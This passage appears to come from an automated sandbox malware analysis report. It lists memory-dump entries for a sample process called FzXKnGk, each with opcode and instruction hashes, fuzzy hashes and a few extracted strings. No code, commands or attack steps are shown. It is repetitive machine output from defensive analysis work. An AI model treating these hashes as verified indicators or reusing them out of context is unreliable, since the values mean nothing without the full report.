                                                                                                                                                    • Opcode Fuzzy Hash: 323ea2f5c5fc7baca362b681fdba199152ec0c978a73f68a41f611f75261a9e4
                                                                                                                                                    • Instruction Fuzzy Hash: 23219075A001159FCB15DF28C4409EE77AAEBDD3A4B24C059E84ADB340DE34EA43CBD2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2938753755.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_159d000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 215b17f1ad1cb6c3609d445266515c9fafc3648fc51e97c1a35eaab5c47062b0
                                                                                                                                                    • Instruction ID: a0c362a56145c257414367a5d6c0b27060ca9fe829a1f5a97da7758024349082
                                                                                                                                                    • Opcode Fuzzy Hash: 215b17f1ad1cb6c3609d445266515c9fafc3648fc51e97c1a35eaab5c47062b0
                                                                                                                                                    • Instruction Fuzzy Hash: 2621E072500200DFDF059F98DAC0B2ABFB5FB98318F24C569E9090E256C37AD456C7A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 016311dfab5e99f38a018098563a3e265b8afdf7ac9b2de5888061bd176fc1b5
                                                                                                                                                    • Instruction ID: 3514958d955642344634f01314048e7ab2d052f59d2ac75ce48b02aa918c94a2
                                                                                                                                                    • Opcode Fuzzy Hash: 016311dfab5e99f38a018098563a3e265b8afdf7ac9b2de5888061bd176fc1b5
                                                                                                                                                    • Instruction Fuzzy Hash: 22210535701612AFD7259A2DC45492EB7A6FFCA7597288079E90ACB354DF34DE02CBC0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2938837509.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_15ad000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 83fb31aca7ca1f8c8aebadc3f3c423f5231b22fb63dfece26c4eca0287207760
                                                                                                                                                    • Instruction ID: 44e11cbef5779a8e3c30245c73376bd9ef6b04636ef20ed3cb83fe0294249f6f
                                                                                                                                                    • Opcode Fuzzy Hash: 83fb31aca7ca1f8c8aebadc3f3c423f5231b22fb63dfece26c4eca0287207760
                                                                                                                                                    • Instruction Fuzzy Hash: 3C213471584204DFCB11EF68C9C4B2EBBB5FB88314F60C96DE8494F652D73AD446CA61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71b9c1e2b2b5a16524af531656e4c349f3f479abdc161bdd89bddad67dbffc31
                                                                                                                                                    • Instruction ID: af84c0a306cd6cd1830f57f6d6aefc7896ffe1540c2b087440c1ccee77809b27
                                                                                                                                                    • Opcode Fuzzy Hash: 71b9c1e2b2b5a16524af531656e4c349f3f479abdc161bdd89bddad67dbffc31
                                                                                                                                                    • Instruction Fuzzy Hash: 0221FF31A05209CFCB429F68E409AAA3BA2FBE9315F044069E905CB258DB389E54CFD1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cbf76aa737be1d04aa2c4f56a2d9460ca68984f7f6ab3485a7598bdf00f5521e
                                                                                                                                                    • Instruction ID: efb3c3b747f2b67379fbe7bdc0ad3f7cd2f20539b605a160ba2ae9d81d49676d
                                                                                                                                                    • Opcode Fuzzy Hash: cbf76aa737be1d04aa2c4f56a2d9460ca68984f7f6ab3485a7598bdf00f5521e
                                                                                                                                                    • Instruction Fuzzy Hash: 39215C34E00249DFDB15CFA5D5509EDBFB6EF89309F288065E415E6394DB389A41CF50
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 82e813f8fc4b94fd4690c54d96ef1a25a9723b8a36a2e4943c3233e3471413b8
                                                                                                                                                    • Instruction ID: e82b11795555a212fb0b1e3ec60bc58e70b3aaccff7702c245c66c1bdd977759
                                                                                                                                                    • Opcode Fuzzy Hash: 82e813f8fc4b94fd4690c54d96ef1a25a9723b8a36a2e4943c3233e3471413b8
                                                                                                                                                    • Instruction Fuzzy Hash: 1B11E335705612AFD7169A2ED45853E7BA2FFDA35532C4069E506CB364DF24CE028BD0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33a48d059ada0529d2f9f67df87c01e21465815434f51b7f0361bffd9c632531
                                                                                                                                                    • Instruction ID: e6905b8d0b38e759c8f2d4627eef81ff641795c857ed86af812904676509f0d5
                                                                                                                                                    • Opcode Fuzzy Hash: 33a48d059ada0529d2f9f67df87c01e21465815434f51b7f0361bffd9c632531
                                                                                                                                                    • Instruction Fuzzy Hash: A2218870A0020ADFCB40DFB8D98069EBFF2FF84300F1495A9D0549B225EB30AA09CB81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f20e87b7b8dab0ce5f63d86dd04931ed9971b94e0d312f3d332ab0ab981f6bb
                                                                                                                                                    • Instruction ID: a13741b04b25aed9ac481bee517cd451e660f38c05666ec765cf197ad47c93b2
                                                                                                                                                    • Opcode Fuzzy Hash: 8f20e87b7b8dab0ce5f63d86dd04931ed9971b94e0d312f3d332ab0ab981f6bb
                                                                                                                                                    • Instruction Fuzzy Hash: 0E21DE74D0521A8FCB51DFA8D8445EEBFF1EF4A310F1452AAD805B6214EB381A85CFA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000C.00000002.2938753755.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_159d000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: cfa0b02442424d95d6dc2c975b7f1a481bd390eb4a1276329ed184c63dadd90f
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction Fuzzy Hash: E0119D76504240CFDF16CF54D5C4B1ABF71FB94318F24C5A9D9090B256C336D45ACBA2

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 735380c80f31dd4af3332ff5066e68fc9f88528f48042ae7bad542c09d0ca9e9
• Instruction ID: f75470b08edd168417f20e93ef55ceb3c13c5beda03ac9c6ecdf46e2660f5da6
• Opcode Fuzzy Hash: 735380c80f31dd4af3332ff5066e68fc9f88528f48042ae7bad542c09d0ca9e9
• Instruction Fuzzy Hash: BF117C70E0010ADFCB44DFB8D58069EBFF6FB84300F10D5A9C1189B324EB74AA498B81

Memory Dump Source
• Source File: 0000000C.00000002.2938837509.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_15ad000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: 90e3290f241b71ac49313fb06556284c02c3f248cf94471d9d9a7e6ee2b6dc88
• Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction Fuzzy Hash: 5611AC755442448FDB12DF54C5C4B19BBB2FB44214F24C6A9E8494F652C33AD44ACB51

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd7868197cf90984fdebe17e4253e6bed08bae5064978f8391667d99deb6b018
• Instruction ID: dec17de12d0df99d44f7ee3ca80471e384eb565bcd13754c38510259e0efac31
• Opcode Fuzzy Hash: bd7868197cf90984fdebe17e4253e6bed08bae5064978f8391667d99deb6b018
• Instruction Fuzzy Hash: 4E012D327002555FCB528E68D8106AE3FE7EFD9351B188065F904CB284DA758F1187E2

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4fb11c4436c53ad1e70261009a114ba2bc7609422651f18bbb3e0caf7503e21
• Instruction ID: c540e782cc8198fafb2c8220ea461b2e55d4e88899a5a6598e0d7429fe156245
• Opcode Fuzzy Hash: c4fb11c4436c53ad1e70261009a114ba2bc7609422651f18bbb3e0caf7503e21
• Instruction Fuzzy Hash: 9E113574E0020AEFDB41CFA4E4409EEBBB1FB89310F108066D810A3350D7785A16DF91

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff8960d73b65f3e44baaba79458b291ca42e36f3b01284236a0033e9f7aa862d
• Instruction ID: 5b747073cf3d4b72612264c3c2956c60a85087d0bce718d717c3067135561635
• Opcode Fuzzy Hash: ff8960d73b65f3e44baaba79458b291ca42e36f3b01284236a0033e9f7aa862d
• Instruction Fuzzy Hash: 98F02B353002144B9B2E5A2ED454A2ABBDEEFC8B5530D4079E949C7361EE24CD0387C0

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 850093f8d24bea86049ab62ff9d704bc5a57eb0f4374a3c98141e4739b1a8dd9
• Instruction ID: 435028860cb898eb4dd1bfa853fcfe8eb80f3ed4a96f51a99ca579440e57ef97
• Opcode Fuzzy Hash: 850093f8d24bea86049ab62ff9d704bc5a57eb0f4374a3c98141e4739b1a8dd9
• Instruction Fuzzy Hash: 2CF090329102589FCF12CF68D848AEABBF5EFC9335F088166E518CB265D3314A15CB91

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31dd265918bd5bf402663c96dfa0dba19004f01e546a1c7030c65be8c409e0d0
• Instruction ID: 38d70ecb465374ae381aeea74df26ddedd0411d9b6e50b866f6e7dcbf21ac37b
• Opcode Fuzzy Hash: 31dd265918bd5bf402663c96dfa0dba19004f01e546a1c7030c65be8c409e0d0
• Instruction Fuzzy Hash: 14E02632E10326CBC701EBF0EC000EEF734AEC6211B48465BC0A837190EB306219C793

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43133a2a0aab2a899e5ce5c8a3e769f3a319fc564ee38c7f0fb24bf0cd5deec7
• Instruction ID: 15fbb1bf25a298d23daf199449d7f32535d7f97b8216a0597654fce5e18f143c
• Opcode Fuzzy Hash: 43133a2a0aab2a899e5ce5c8a3e769f3a319fc564ee38c7f0fb24bf0cd5deec7
• Instruction Fuzzy Hash: 60E086300083564FCB039B30D8551647BBEEE92315B1090E1D4054D16FDF7C18458B52

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1bcde3b24ac54d04faf17ec1eeae87ed58d3f5a3d6a8f08dcbf3a28ab98a354e
• Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
• Opcode Fuzzy Hash: 1bcde3b24ac54d04faf17ec1eeae87ed58d3f5a3d6a8f08dcbf3a28ab98a354e
• Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f652b076075d458cac09ed7eede02fc6b0a2040571dd80b14b29f5c89e5d91c
• Instruction ID: a46855b3d93c2d0875beff48976183557d0f9ee57d2f60c4ae4b4113fe3983f7
• Opcode Fuzzy Hash: 0f652b076075d458cac09ed7eede02fc6b0a2040571dd80b14b29f5c89e5d91c
• Instruction Fuzzy Hash: FED0673AB41018DFCB149F99E8408DDF7B6FB98221B148126E915A3265C6319925DB54

Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb529b51a954339ab472cc9a7042fed832618d2e7e9ca5a5632ceca0392e4bb8
• Instruction ID: 9d26a06793eda14736edaace0b2bfd11837c7f1517d7e0d3c8ae497a605cdc06
• Opcode Fuzzy Hash: eb529b51a954339ab472cc9a7042fed832618d2e7e9ca5a5632ceca0392e4bb8
• Instruction Fuzzy Hash: 8EC012340443094EC741EB75ED465A5772EF6D0300B50D56090050A66EDF7C6D894F90

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID: Xbq$Xbq$Xbq$Xbq
• API String ID: 0-2732225958
• Opcode ID: a70ce1f24bc402affdefba2616fb5f44d1348235fafa08f7d6a97fbab26e3333
• Instruction ID: 179ade7e8b1a20592afc5c6efd7b20b24a49ee862626095a1c382b9fab98558d
• Opcode Fuzzy Hash: a70ce1f24bc402affdefba2616fb5f44d1348235fafa08f7d6a97fbab26e3333
• Instruction Fuzzy Hash: 50314D71E002298BDF699F6D898036EBAA7ABC4300F184479C515E7295EB74CB819BD2

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2940123502.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1830000_FzXKnGk.jbxd
Similarity
• API ID:
• String ID: \;^q$\;^q$\;^q$\;^q
• API String ID: 0-3001612457
• Opcode ID: 310e0457d29783e03ff090df79abcf383d676396db68e5c74ff04a71224f2778
• Instruction ID: 900d5982132640e07f2849caf14394099c28fa0a223789c1d1a11e91241f7888
• Opcode Fuzzy Hash: 310e0457d29783e03ff090df79abcf383d676396db68e5c74ff04a71224f2778
• Instruction Fuzzy Hash: B601BC31B40109EFCB648E2CC5449A537EBAFC8B64739446AE946CF3B5EA31DE4187C0